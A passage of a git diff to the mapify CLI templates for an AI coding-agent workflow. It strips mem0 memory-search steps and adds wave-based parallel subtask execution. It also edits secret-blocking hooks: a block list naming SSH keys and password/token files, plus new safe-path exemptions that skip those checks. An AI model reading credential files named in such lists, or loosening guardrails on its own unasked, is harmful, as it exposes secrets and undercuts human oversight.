run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "FRONTEND_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-def456", tier: "branch"} -``` - -### Example 2: Batched learning with promotion +### Example 2: Batched learning User completed 3 separate debugging sessions, wants to batch-learn: @@ -397,31 +199,9 @@ Common theme: Concurrency issues" ``` Reflector extracts: -- mem0 tiered search found "concurrency control" in project tier (helpful_count: 4) -- Common 
pattern: Concurrency control (UPDATE existing) +- Common pattern: Concurrency control - New patterns: DB locks, connection pooling, timezone handling -Curator stores and promotes: -``` -# Update existing pattern (increment helpful_count) -mcp__mem0__update_memory( - memory_id="mem-existing-concurrency", - text="Updated concurrency control pattern with 3 new use cases..." -) - -# Store new patterns at branch tier -mcp__mem0__map_add_pattern(text="Database transaction locks...", ...) -mcp__mem0__map_add_pattern(text="Connection pooling with limits...", ...) -mcp__mem0__map_add_pattern(text="UTC-everywhere timezone pattern...", ...) - -# Promote existing pattern to org tier (helpful_count now 5) -mcp__mem0__map_promote_pattern( - memory_id="mem-existing-concurrency", - target_user_id="org:myorg" -) -→ {promoted: true, new_memory_id: "mem-org-xyz", new_tier: "org"} -``` - --- ## Integration with Other Commands @@ -463,10 +243,4 @@ mcp__mem0__map_promote_pattern( - Capturing holistic patterns across subtasks - Custom workflows that didn't include learning -**Storage Architecture Benefits:** -- **Fingerprint deduplication:** Prevents duplicate patterns automatically -- **Tiered inheritance:** Branch patterns inherit from project, project from org -- **Quality-driven promotion:** Proven patterns automatically bubble up to higher tiers -- **Soft delete:** Archived patterns preserved for audit, excluded from search - **Remember:** The goal is to build organizational knowledge, not to learn from every single task. Quality over quantity. diff --git a/src/mapify_cli/templates/commands/map-release.md b/src/mapify_cli/templates/commands/map-release.md index 24fb187..a6afddb 100644 --- a/src/mapify_cli/templates/commands/map-release.md +++ b/src/mapify_cli/templates/commands/map-release.md @@ -65,16 +65,7 @@ Phase 7: Final Summary and Cleanup **Purpose:** Verify all prerequisites before initiating release. Failure in any gate aborts the workflow. 
-### 1.1 Load mem0 Context for Release Patterns - -Search mem0 for release-related patterns and past release issues: - -```bash -# Fetch release-related patterns from mem0 -RELEASE_PATTERNS=$(mcp__mem0__map_tiered_search(query="release validation PyPI CI/CD", limit=10)) -``` - -### 1.2 Validation Gates (12 Required) +### 1.1 Validation Gates (12 Required) Execute all validation gates in parallel where possible: @@ -267,7 +258,7 @@ fi **Gap tolerance:** ±2 commits (accounts for chore commits, merge commits, etc.) -### 1.3 Phase 1 Complete +### 1.2 Phase 1 Complete If all 12 gates pass, proceed to Phase 2. @@ -1153,8 +1144,6 @@ pip index versions mapify-cli Use these MCP tools throughout the workflow: -- **`mcp__mem0__map_tiered_search`** - Search for release patterns from past projects -- **`mcp__mem0__map_add_pattern`** - Store release learnings cross-project - **`mcp__sequential-thinking__sequentialthinking`** - Complex decision making for version bump **Built-in Tools (not MCP):** @@ -1200,7 +1189,6 @@ You should: 1. **Phase 1 - Pre-Release Validation:** ```bash - mcp__mem0__map_tiered_search(query="release validation PyPI", limit=10) # Run all 12 validation gates pytest tests/ && black --check src/ && ruff check src/ && mypy src/ && ... # Verify CI passed on main diff --git a/src/mapify_cli/templates/commands/map-review.md b/src/mapify_cli/templates/commands/map-review.md index ea8623b..d271dac 100644 --- a/src/mapify_cli/templates/commands/map-review.md +++ b/src/mapify_cli/templates/commands/map-review.md @@ -63,7 +63,7 @@ These are the fields each agent is expected to return. The command prompt explic This protocol is used identically by all 4 review sections below. Do NOT deviate. -1. **Present top N issues** (N=4 in BIG mode, N=1 in SMALL mode) from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) +1. 
**Present top 4 issues** from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) 2. **For each issue:** - Describe the problem with `file:line` references where available - Present 2-3 options with tradeoffs (pros/cons for each) @@ -74,19 +74,13 @@ This protocol is used identically by all 4 review sections below. Do NOT deviate 4. **Summarize decisions** from this section in 3-5 lines before proceeding to the next section - Include: which issues were addressed, which options were chosen, what remains -## Step 0: Select Review Mode +## Step 0: Detect CI Mode **Parse $ARGUMENTS for `--ci` or `--auto`:** - If `--ci` or `--auto` is present in $ARGUMENTS → set CI_MODE=true - CI_MODE skips all AskUserQuestion calls and auto-selects recommended options -**If NOT CI_MODE:** Use AskUserQuestion to ask the user: - -> How thorough should this review be? -> - **BIG** (Recommended): Up to 4 issues per section — comprehensive review -> - **SMALL**: 1 issue per section — quick pass for small changes - -Default to BIG if user doesn't respond or in CI mode. +**Always use comprehensive review** — up to 4 issues per section, no mode selection menu. ## Phase A: Collection (Parallel) @@ -101,16 +95,7 @@ Save the diff output — it will be passed to all 3 agents. 
### Step A.2: Launch all parallel calls -In **ONE message**, launch all 7 calls in parallel (no dependencies between them): - -**4 mem0 queries:** - -``` -mcp__mem0__map_tiered_search(query="architecture review patterns") -mcp__mem0__map_tiered_search(query="code quality standards") -mcp__mem0__map_tiered_search(query="test coverage criteria") -mcp__mem0__map_tiered_search(query="performance review patterns") -``` +In **ONE message**, launch all 3 calls in parallel (no dependencies between them): **3 agent Task calls** (pass the git diff + Review Preferences to each): @@ -126,9 +111,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture + code quality results] - Check for: - Code correctness and logic errors - Security vulnerabilities (OWASP top 10) @@ -156,9 +138,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture results] - Analyze: - Affected components and modules - Breaking changes (API, schema, behavior) @@ -187,9 +166,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use code quality + test coverage results] - Provide quality assessment using 1-10 scoring: - Functionality score (1-10) - Code quality score (1-10) @@ -208,7 +184,7 @@ Output JSON with: ) ``` -**Parallel execution:** All 7 calls (4 mem0 + 3 agents) MUST be issued in a single message. Wait for all to complete before proceeding. +**Parallel execution:** All 3 agent calls MUST be issued in a single message. Wait for all to complete before proceeding. 
### Hard Stop Check @@ -309,7 +285,6 @@ Present the verdict with a summary table: When `CI_MODE = true` (triggered by `--ci` or `--auto` in $ARGUMENTS): - Skip all AskUserQuestion calls -- Auto-select BIG mode (4 issues per section) - Auto-select recommended options for all issues - Present all 4 sections as a batch report (no pauses between sections) - Output structured verdict at the end @@ -325,7 +300,6 @@ If the review revealed valuable patterns or common issues worth preserving: ## MCP Tools Used -- `mcp__mem0__map_tiered_search` — Search past review patterns (4 targeted queries) - `mcp__sequential-thinking__sequentialthinking` — Complex analysis decisions during interactive presentation --- diff --git a/src/mapify_cli/templates/hooks/block-secrets.py b/src/mapify_cli/templates/hooks/block-secrets.py index ac46e72..a416fac 100755 --- a/src/mapify_cli/templates/hooks/block-secrets.py +++ b/src/mapify_cli/templates/hooks/block-secrets.py @@ -60,14 +60,39 @@ ] +SAFE_PATH_PREFIXES = [ + ".claude/hooks/", + ".claude/agents/", + ".claude/commands/", + ".claude/references/", + ".claude/skills/", + "src/", + "tests/", + "docs/", + "scripts/", +] + + def is_sensitive_file(file_path: str) -> bool: """Check if file path matches any sensitive file pattern. Checks ALL path components (not just filename) to catch patterns - in directory names or parent paths. + in directory names or parent paths. Skips files in known safe + directories (hooks, agents, source code, tests, etc.) 
""" path_obj = Path(file_path) + # Normalize to relative path for prefix matching + try: + rel = str(path_obj.relative_to(Path.cwd())) + except ValueError: + rel = str(path_obj) + + # Allow known safe directories + for prefix in SAFE_PATH_PREFIXES: + if rel.startswith(prefix): + return False + # Check each path component against all patterns for part in path_obj.parts: for pattern in SENSITIVE_PATTERNS: diff --git a/src/mapify_cli/templates/hooks/safety-guardrails.py b/src/mapify_cli/templates/hooks/safety-guardrails.py old mode 100644 new mode 100755 index 4174337..20aa031 --- a/src/mapify_cli/templates/hooks/safety-guardrails.py +++ b/src/mapify_cli/templates/hooks/safety-guardrails.py @@ -26,8 +26,8 @@ r"id_rsa", r"id_ed25519", r"\.key$", - r"password", - r"token", + r"passwords?\.(json|ya?ml|toml|txt)$", # password files, not any file with "password" in path + r"tokens?\.(json|ya?ml|toml|txt)$", # token files, not any file with "token" in path ] # Dangerous bash command patterns @@ -46,7 +46,11 @@ ] # Safe path prefixes (skip checks for known safe directories) -SAFE_PATH_PREFIXES = ["src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/"] +SAFE_PATH_PREFIXES = [ + "src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/", + ".claude/agents/", ".claude/commands/", ".claude/hooks/", ".claude/references/", + ".claude/skills/", "scripts/", +] def is_safe_path(path: str) -> bool: diff --git a/src/mapify_cli/templates/hooks/workflow-context-injector.py b/src/mapify_cli/templates/hooks/workflow-context-injector.py index 72145e5..354234f 100755 --- a/src/mapify_cli/templates/hooks/workflow-context-injector.py +++ b/src/mapify_cli/templates/hooks/workflow-context-injector.py @@ -151,7 +151,7 @@ def required_action_for_step(step_id: str, step_phase: str, state: dict) -> str if step_id == "1.56": return "Choose mode (set_execution_mode step_by_step|batch)" if step_id == "2.1": - return "Run mem0 search before Actor" + return "Run context 
search before Actor (skip if not needed)" if step_id == "2.3": return "Run Actor" if step_id == "2.4": @@ -189,6 +189,17 @@ def format_reminder(state: dict, branch: str) -> str | None: plan_ok = "y" if state.get("plan_approved") else "n" mode = (state.get("execution_mode") or "").strip() or "batch" + # Wave progress display + waves = state.get("execution_waves") or [] + wave_idx = state.get("current_wave_index", 0) + wave_hint = "" + if waves: + wave_hint = f" | WAVE {wave_idx + 1}/{len(waves)}" + current_wave = waves[wave_idx] if wave_idx < len(waves) else [] + if len(current_wave) > 1: + wave_hint += f" ({', '.join(current_wave)})" + mode = "batch:parallel" + required = required_action_for_step(step_id, step_phase, state) diag_hint = "" @@ -204,7 +215,7 @@ def format_reminder(state: dict, branch: str) -> str | None: if not step_id and not step_phase: return None - base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{diag_hint}" + base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{wave_hint}{diag_hint}" if required: return f"{base} | REQUIRED: {required}" return base diff --git a/src/mapify_cli/templates/hooks/workflow-gate.py b/src/mapify_cli/templates/hooks/workflow-gate.py index a74be23..f403393 100755 --- a/src/mapify_cli/templates/hooks/workflow-gate.py +++ b/src/mapify_cli/templates/hooks/workflow-gate.py @@ -150,13 +150,24 @@ def load_workflow_state(branch: str) -> Optional[Dict]: def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: """ - Check if current subtask has completed required workflow steps. + Check if current subtask(s) have completed required workflow steps. + + Supports both single-subtask mode (current_subtask) and parallel wave mode + (active_subtasks list). In parallel mode, allows edits if ANY active + subtask has completed the required steps. 
Returns: (is_compliant, error_message) """ - current_subtask = state.get("current_subtask") - if not current_subtask: + # Try active_subtasks first (parallel wave mode) + active = state.get("active_subtasks", []) + if not active: + # Backward compat: single current_subtask + current = state.get("current_subtask") + if current: + active = [current] + + if not active: current_state = state.get("current_state") or "UNKNOWN" return False, ( "⛔ Workflow Enforcement: No current_subtask defined in workflow_state.json\n\n" @@ -169,26 +180,33 @@ def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: " - Or delete .map//workflow_state.json to disable enforcement" ) - completed = state.get("completed_steps", {}).get(current_subtask, []) - - missing_steps = [step for step in REQUIRED_STEPS if step not in completed] - - if missing_steps: - pending = state.get("pending_steps", {}).get(current_subtask, []) - return False, ( - f"⛔ Workflow Enforcement: Cannot edit code for {current_subtask}\n\n" - f"Missing required steps: {', '.join(missing_steps)}\n" - f"Completed: {', '.join(completed) if completed else 'none'}\n" - f"Pending: {', '.join(pending) if pending else 'none'}\n\n" - f"Required workflow:\n" - f" 1. Call Task(subagent_type='actor') to generate implementation\n" - f" 2. Call Task(subagent_type='monitor') to validate\n" - f" 3. Only then can you apply changes with Edit/Write\n\n" - f"To fix: Complete missing steps before editing code.\n" - f"Or update workflow_state.json if steps were completed." 
- ) - - return True, None + # Allow if ANY active subtask has completed required steps + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + if all(step in completed for step in REQUIRED_STEPS): + return True, None + + # Block with appropriate message + missing_details = [] + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + missing = [step for step in REQUIRED_STEPS if step not in completed] + if missing: + missing_details.append(f"{subtask_id}: missing {', '.join(missing)}") + + return False, ( + f"⛔ Workflow Enforcement: Cannot edit code for active subtasks\n\n" + f"Active subtasks: {', '.join(active)}\n" + f"Missing steps:\n" + + "\n".join(f" - {d}" for d in missing_details) + + "\n\n" + "Required workflow:\n" + " 1. Call Task(subagent_type='actor') to generate implementation\n" + " 2. Call Task(subagent_type='monitor') to validate\n" + " 3. Only then can you apply changes with Edit/Write\n\n" + "To fix: Complete missing steps before editing code.\n" + "Or update workflow_state.json if steps were completed." + ) def main(): diff --git a/src/mapify_cli/templates/map/scripts/map_orchestrator.py b/src/mapify_cli/templates/map/scripts/map_orchestrator.py index 6c7bad6..a67114b 100755 --- a/src/mapify_cli/templates/map/scripts/map_orchestrator.py +++ b/src/mapify_cli/templates/map/scripts/map_orchestrator.py @@ -14,7 +14,7 @@ ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md (~540 lines) │ │ ├─> 1. Call get_next_step() → returns step instruction │ - │ ├─> 2. Execute step (Actor/Monitor/mem0/etc) │ + │ ├─> 2. Execute step (Actor/Monitor/etc) │ │ ├─> 3. Call validate_step() → checks completion │ │ ├─> 4. If more steps: recurse with fresh context │ │ └─> 5. 
Else: complete workflow │ @@ -30,9 +30,9 @@ "subtask_index": 0, "subtask_sequence": ["ST-001", "ST-002", "ST-003"], "current_step_id": "2.1", - "current_step_phase": "MEM0_SEARCH", + "current_step_phase": "CONTEXT_SEARCH", "completed_steps": ["1.0_DECOMPOSE", "1.5_INIT_PLAN", "2.0_XML_PACKET"], - "pending_steps": ["2.1_MEM0_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] + "pending_steps": ["2.1_CONTEXT_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] } STEP PHASES (16 total): @@ -42,7 +42,7 @@ 1.56 CHOOSE_MODE - Choose execution mode (step_by_step|batch) 1.6 INIT_STATE - Create workflow_state.json 2.0 XML_PACKET - Build AI-friendly subtask packet - 2.1 MEM0_SEARCH - Tiered memory search + 2.1 CONTEXT_SEARCH - Context search 2.2 RESEARCH - research-agent (conditional) 2.3 ACTOR - Actor agent implementation 2.4 MONITOR - Monitor validation @@ -107,7 +107,7 @@ "1.56": "CHOOSE_MODE", "1.6": "INIT_STATE", "2.0": "XML_PACKET", - "2.1": "MEM0_SEARCH", + "2.1": "CONTEXT_SEARCH", "2.2": "RESEARCH", "2.3": "ACTOR", "2.4": "MONITOR", @@ -167,6 +167,11 @@ class StepState: max_retries: int = 5 plan_approved: bool = False execution_mode: str = "batch" # batch|step_by_step + # Wave-based parallel execution fields + execution_waves: List[List[str]] = field(default_factory=list) + current_wave_index: int = 0 + subtask_phases: Dict[str, str] = field(default_factory=dict) + subtask_retry_counts: Dict[str, int] = field(default_factory=dict) def to_dict(self) -> dict: """Serialize to dictionary.""" @@ -184,6 +189,10 @@ def to_dict(self) -> dict: "max_retries": self.max_retries, "plan_approved": self.plan_approved, "execution_mode": self.execution_mode, + "execution_waves": self.execution_waves, + "current_wave_index": self.current_wave_index, + "subtask_phases": self.subtask_phases, + "subtask_retry_counts": self.subtask_retry_counts, } @classmethod @@ -203,6 +212,10 @@ def from_dict(cls, data: dict) -> "StepState": max_retries=data.get("max_retries", 5), plan_approved=data.get("plan_approved", 
False), execution_mode=data.get("execution_mode", "batch"), + execution_waves=data.get("execution_waves", []), + current_wave_index=data.get("current_wave_index", 0), + subtask_phases=data.get("subtask_phases", {}), + subtask_retry_counts=data.get("subtask_retry_counts", {}), ) @classmethod @@ -293,7 +306,7 @@ def get_step_instruction(step_id: str, state: StepState) -> str: "validation_criteria, and test_strategy." ), "2.1": ( - "Call mcp__mem0__map_tiered_search to retrieve relevant patterns. " + "Search for relevant patterns and context. " "Re-rank by relevance and pass top 3 to Actor." ), "2.2": ( @@ -588,6 +601,255 @@ def set_execution_mode(mode: str, branch: str) -> Dict: return {"status": "success", "execution_mode": state.execution_mode} +def set_waves(branch: str, blueprint_path: Optional[str] = None) -> Dict: + """Compute execution waves from blueprint DAG and store in step_state.json. + + Reads the blueprint JSON, builds a DependencyGraph, computes topological + waves, and splits waves by file conflicts. Stores the result in + step_state.execution_waves. + + Args: + branch: Git branch name (sanitized) + blueprint_path: Path to blueprint JSON (default: .map//blueprint.json) + + Returns: + Dict with status and computed waves + """ + # Import here to avoid circular deps at module level + sys_path_added = False + try: + from mapify_cli.dependency_graph import DependencyGraph, SubtaskNode + except ImportError: + # When running as a standalone script inside .map/scripts/, + # dependency_graph.py is not on the path. Try a relative import + # from the repo root (two levels up from .map/scripts/). 
+ import importlib.util + + dg_candidates = [ + Path("src/mapify_cli/dependency_graph.py"), + Path(__file__).resolve().parents[3] / "src" / "mapify_cli" / "dependency_graph.py", + ] + loaded = False + for candidate in dg_candidates: + if candidate.exists(): + spec = importlib.util.spec_from_file_location("dependency_graph", candidate) + if spec and spec.loader: + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + DependencyGraph = mod.DependencyGraph # noqa: N806 + SubtaskNode = mod.SubtaskNode # noqa: N806 + loaded = True + break + if not loaded: + return { + "status": "error", + "message": "Cannot import dependency_graph module", + } + + if blueprint_path is None: + blueprint_path = f".map/{branch}/blueprint.json" + + bp_file = Path(blueprint_path) + if not bp_file.exists(): + return { + "status": "error", + "message": f"Blueprint not found: {blueprint_path}", + } + + try: + blueprint = json.loads(bp_file.read_text(encoding="utf-8")) + except (json.JSONDecodeError, OSError) as exc: + return {"status": "error", "message": f"Invalid blueprint: {exc}"} + + subtasks = blueprint.get("subtasks", []) + if not subtasks: + return {"status": "error", "message": "No subtasks in blueprint"} + + # Build graph + graph = DependencyGraph() + affected_files_map: Dict[str, set] = {} + for st in subtasks: + st_id = st.get("id", "") + deps = st.get("dependencies", []) + graph.add_node(SubtaskNode(id=st_id, dependencies=deps)) + files = st.get("affected_files", []) + affected_files_map[st_id] = set(files) if files else set() + + # Compute waves + raw_waves = graph.compute_waves() + if raw_waves is None: + return {"status": "error", "message": "Cycle detected in dependency graph"} + + # Split each wave by file conflicts + final_waves: List[List[str]] = [] + for wave in raw_waves: + sub_waves = graph.split_wave_by_file_conflicts(wave, affected_files_map) + final_waves.extend(sub_waves) + + # Store in state + state_file = Path(f".map/{branch}/step_state.json") 
+ state = StepState.load(state_file) + state.execution_waves = final_waves + state.current_wave_index = 0 + state.subtask_phases = {} + state.subtask_retry_counts = {} + state.save(state_file) + + return { + "status": "success", + "execution_waves": final_waves, + "wave_count": len(final_waves), + } + + +def get_wave_step(branch: str) -> Dict: + """Get the current wave's subtask batch and per-subtask phases. + + Returns JSON describing what to execute next in wave-based mode. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with mode (parallel|sequential), wave_index, subtasks, is_complete + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return { + "mode": "sequential", + "wave_index": 0, + "subtasks": [], + "is_complete": True, + "message": "No execution waves configured. Use sequential mode.", + } + + if state.current_wave_index >= len(state.execution_waves): + return { + "mode": "sequential", + "wave_index": state.current_wave_index, + "subtasks": [], + "is_complete": True, + } + + wave = state.execution_waves[state.current_wave_index] + mode = "sequential" if len(wave) == 1 else "parallel" + + # Build subtask info with current phases + subtask_infos = [] + for st_id in wave: + phase = state.subtask_phases.get(st_id, "2.3") + phase_name = STEP_PHASES.get(phase, "ACTOR") + subtask_infos.append({ + "subtask_id": st_id, + "phase": phase_name, + "step_id": phase, + }) + + return { + "mode": mode, + "wave_index": state.current_wave_index, + "wave_total": len(state.execution_waves), + "subtasks": subtask_infos, + "is_complete": False, + } + + +def validate_wave_step(subtask_id: str, step_id: str, branch: str) -> Dict: + """Validate one subtask's step within a wave and advance its phase. 
+ + Args: + subtask_id: Subtask ID (e.g., "ST-002") + step_id: Step ID completed (e.g., "2.3") + branch: Git branch name (sanitized) + + Returns: + Dict with validation result and next phase for this subtask + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + # Evidence-gated validation for actor/monitor steps + if step_id in EVIDENCE_REQUIRED: + phase_name, _always_required = EVIDENCE_REQUIRED[step_id] + evidence_dir = Path(f".map/{branch}/evidence") + if evidence_dir.is_dir(): + evidence_file = evidence_dir / f"{phase_name}_{subtask_id}.json" + if not evidence_file.exists(): + return { + "valid": False, + "message": ( + f"Evidence file missing: {evidence_file}. " + f"The {phase_name} agent must write this file." + ), + } + + # Determine next phase for this subtask + subtask_step_order = [s for s in STEP_ORDER if s.startswith("2.")] + current_idx = subtask_step_order.index(step_id) if step_id in subtask_step_order else -1 + + if current_idx >= 0 and current_idx + 1 < len(subtask_step_order): + next_phase = subtask_step_order[current_idx + 1] + else: + next_phase = "COMPLETE" + + state.subtask_phases[subtask_id] = next_phase + state.save(state_file) + + return { + "valid": True, + "message": f"Step {step_id} for {subtask_id} completed", + "next_phase": next_phase, + "subtask_id": subtask_id, + } + + +def advance_wave(branch: str) -> Dict: + """Advance to the next execution wave. + + Called when all subtasks in current wave have passed VERIFY_ADHERENCE. 
+ + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with status and new wave index + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return {"status": "error", "message": "No execution waves configured"} + + state.current_wave_index += 1 + # Reset per-subtask phases for the new wave + state.subtask_phases = {} + state.subtask_retry_counts = {} + + is_complete = state.current_wave_index >= len(state.execution_waves) + + # Update subtask_index to track overall progress + if not is_complete: + next_wave = state.execution_waves[state.current_wave_index] + if next_wave: + state.current_subtask_id = next_wave[0] + # Find the index in subtask_sequence + if state.current_subtask_id in state.subtask_sequence: + state.subtask_index = state.subtask_sequence.index( + state.current_subtask_id + ) + + state.save(state_file) + + return { + "status": "success", + "current_wave_index": state.current_wave_index, + "is_complete": is_complete, + "wave_total": len(state.execution_waves), + } + + SKIPPABLE_STEPS = {"2.2", "2.6", "2.11"} @@ -797,6 +1059,10 @@ def main(): "set_subtasks", "resume_from_plan", "check_circuit_breaker", + "set_waves", + "get_wave_step", + "validate_wave_step", + "advance_wave", ], help="Command to execute", ) @@ -807,6 +1073,9 @@ def main(): "extra_args", nargs="*", help="Additional arguments (e.g., more subtask IDs)" ) parser.add_argument("--branch", help="Git branch (auto-detected if omitted)") + parser.add_argument( + "--blueprint", help="Path to blueprint JSON (for set_waves command)" + ) args = parser.parse_args() @@ -889,6 +1158,36 @@ def main(): result = check_circuit_breaker(branch) print(json.dumps(result, indent=2)) + elif args.command == "set_waves": + blueprint_path = args.blueprint or args.task_or_step # --blueprint or positional + result = set_waves(branch, blueprint_path) + print(json.dumps(result, indent=2)) + + elif args.command == 
"get_wave_step": + result = get_wave_step(branch) + print(json.dumps(result, indent=2)) + + elif args.command == "validate_wave_step": + if not args.task_or_step: + print( + json.dumps({"error": "subtask_id required for validate_wave_step"}), + file=sys.stderr, + ) + sys.exit(1) + extra = args.extra_args or [] + if not extra: + print( + json.dumps({"error": "step_id required as second argument"}), + file=sys.stderr, + ) + sys.exit(1) + result = validate_wave_step(args.task_or_step, extra[0], branch) + print(json.dumps(result, indent=2)) + + elif args.command == "advance_wave": + result = advance_wave(branch) + print(json.dumps(result, indent=2)) + except Exception as e: print(json.dumps({"error": str(e)}), file=sys.stderr) sys.exit(1) diff --git a/src/mapify_cli/templates/map/scripts/map_step_runner.py b/src/mapify_cli/templates/map/scripts/map_step_runner.py index 92e388e..ccae80b 100755 --- a/src/mapify_cli/templates/map/scripts/map_step_runner.py +++ b/src/mapify_cli/templates/map/scripts/map_step_runner.py @@ -116,6 +116,82 @@ def update_workflow_state( return {"status": "error", "message": str(e)} +def update_workflow_state_batch( + updates: List[Dict], + branch: Optional[str] = None, +) -> Dict: + """ + Update workflow_state.json for multiple subtasks in one call. + + Used in wave-based parallel execution to update all subtasks in a wave + after their actors/monitors complete. 
+ + Args: + updates: List of dicts, each with: + - subtask_id: Subtask ID (e.g., "ST-002") + - step_name: Step name (e.g., "actor", "monitor") + - new_state: New state (e.g., "ACTOR_CALLED", "MONITOR_PASSED") + branch: Git branch (auto-detected if None) + + Returns: + Dict with status and per-subtask results + """ + if branch is None: + branch = get_branch_name() + + state_file = Path(f".map/{branch}/workflow_state.json") + + if not state_file.exists(): + return {"status": "error", "message": "workflow_state.json not found"} + + try: + state = json.loads(state_file.read_text(encoding="utf-8")) + + if "completed_steps" not in state: + state["completed_steps"] = {} + + results = [] + active_subtasks = [] + + for update in updates: + subtask_id = update.get("subtask_id", "") + step_name = update.get("step_name", "") + new_state = update.get("new_state", "") + + if subtask_id not in state["completed_steps"]: + state["completed_steps"][subtask_id] = [] + + if step_name not in state["completed_steps"][subtask_id]: + state["completed_steps"][subtask_id].append(step_name) + + active_subtasks.append(subtask_id) + results.append({ + "subtask_id": subtask_id, + "step_name": step_name, + "new_state": new_state, + }) + + # Set active_subtasks list for wave mode (used by workflow-gate.py) + state["active_subtasks"] = active_subtasks + if active_subtasks: + state["current_subtask"] = active_subtasks[0] + state["current_state"] = updates[-1].get("new_state", "UPDATED") + + # Write back atomically + tmp_file = state_file.with_suffix(".tmp") + tmp_file.write_text(json.dumps(state, indent=2), encoding="utf-8") + tmp_file.replace(state_file) + + return { + "status": "success", + "message": f"Batch updated {len(updates)} subtasks", + "results": results, + } + + except (json.JSONDecodeError, OSError) as e: + return {"status": "error", "message": str(e)} + + def update_plan_status( subtask_id: str, new_status: str, @@ -342,7 +418,17 @@ def get_current_phase(branch: Optional[str] = None) 
-> Optional[str]: func_name = sys.argv[1] - if func_name == "update_workflow_state" and len(sys.argv) >= 5: + if func_name == "update_workflow_state_batch" and len(sys.argv) >= 3: + updates_json = sys.argv[2] + try: + updates = json.loads(updates_json) + except json.JSONDecodeError as e: + print(json.dumps({"status": "error", "message": f"Invalid JSON: {e}"})) + sys.exit(1) + result = update_workflow_state_batch(updates) + print(json.dumps(result, indent=2)) + + elif func_name == "update_workflow_state" and len(sys.argv) >= 5: result = update_workflow_state(sys.argv[2], sys.argv[3], sys.argv[4]) print(json.dumps(result, indent=2)) diff --git a/src/mapify_cli/templates/references/mcp-usage-examples.md b/src/mapify_cli/templates/references/mcp-usage-examples.md index 4f1e42d..e42092a 100644 --- a/src/mapify_cli/templates/references/mcp-usage-examples.md +++ b/src/mapify_cli/templates/references/mcp-usage-examples.md @@ -4,36 +4,9 @@ Reference examples for task-decomposer agent. Loaded on demand for complex decom --- -## mcp__mem0__map_tiered_search Examples - -**Good Example - Decomposing "Add user authentication"**: -``` -Search: "feature implementation authentication" → find past auth implementations -Search: "task decomposition auth flow" → learn typical subtask breakdown -Result: Discover pattern (from tiered search across branch/project/org): - 1. User model (foundation) - 2. Password hashing (depends on user model) - 3. Login/logout endpoints (depends on password hashing) - 4. Session management (depends on endpoints) - 5. Auth middleware (depends on session) - 6. Protected routes (depends on middleware) - -Use this proven order instead of guessing. 
-``` - -**Bad Example - Decomposing without historical context**: -``` -Jump directly to listing subtasks -→ Miss critical dependency order (e.g., try to implement middleware before session management exists) -→ Overlook edge cases that past implementations revealed -→ Create subtasks that are too coarse or too granular -``` - ---- - ## sequential-thinking for Reasoning Examples -**When to use**: After mem0 search finds similar features +**When to use**: After finding similar features in existing codebase **Key Difference from Pattern Search**: - Pattern search → **Output**: "Here are the 5 subtasks for authentication" @@ -41,7 +14,7 @@ Jump directly to listing subtasks **Example: Decomposing "Add real-time notifications"** -**Step 1 - mcp__mem0__map_tiered_search (WHAT worked)**: +**Step 1 - Search for similar implementations (WHAT worked)**: ``` Query: "feature implementation notifications" Result: Found 3 past implementations with subtask lists: diff --git a/src/mapify_cli/templates/references/step-state-schema.md b/src/mapify_cli/templates/references/step-state-schema.md index 8b5c290..70a52c9 100644 --- a/src/mapify_cli/templates/references/step-state-schema.md +++ b/src/mapify_cli/templates/references/step-state-schema.md @@ -61,8 +61,7 @@ Current step set (linear order; some are conditional): 4. `1.56` CHOOSE_MODE 5. `1.6` INIT_STATE 6. `2.0` XML_PACKET -7. `2.1` MEM0_SEARCH -8. `2.2` RESEARCH (conditional) +7. `2.2` RESEARCH (conditional) 9. `2.3` ACTOR 10. `2.4` MONITOR 11. 
`2.6` PREDICTOR (conditional) diff --git a/src/mapify_cli/templates/references/workflow-state-schema.md b/src/mapify_cli/templates/references/workflow-state-schema.md index e490808..c7f7695 100644 --- a/src/mapify_cli/templates/references/workflow-state-schema.md +++ b/src/mapify_cli/templates/references/workflow-state-schema.md @@ -47,8 +47,6 @@ INITIALIZED → Workflow started, no subtask active ↓ XML_PACKET_CREATED → AI packet created for current subtask ↓ -CONTEXT_LOADED → mem0 tiered search completed - ↓ RESEARCH_DONE → Research agent completed (if 3+ files) ↓ ACTOR_CALLED → Actor agent generated implementation @@ -73,7 +71,6 @@ WORKFLOW_COMPLETE → All subtasks done, final verification pending Standard step names used in `completed_steps` arrays: - `"xml_packet"` - AI-friendly subtask packet created -- `"mem0_search"` - Context patterns retrieved from mem0 - `"research"` - Research agent analyzed codebase (optional, for 3+ files) - `"actor"` - Actor agent generated implementation - `"monitor"` - Monitor agent validated implementation @@ -109,9 +106,9 @@ Standard step names used in `completed_steps` arrays: "ST-001": ["xml_packet"] }, "pending_steps": { - "ST-001": ["mem0_search", "actor", "monitor", "tests", "linter"], 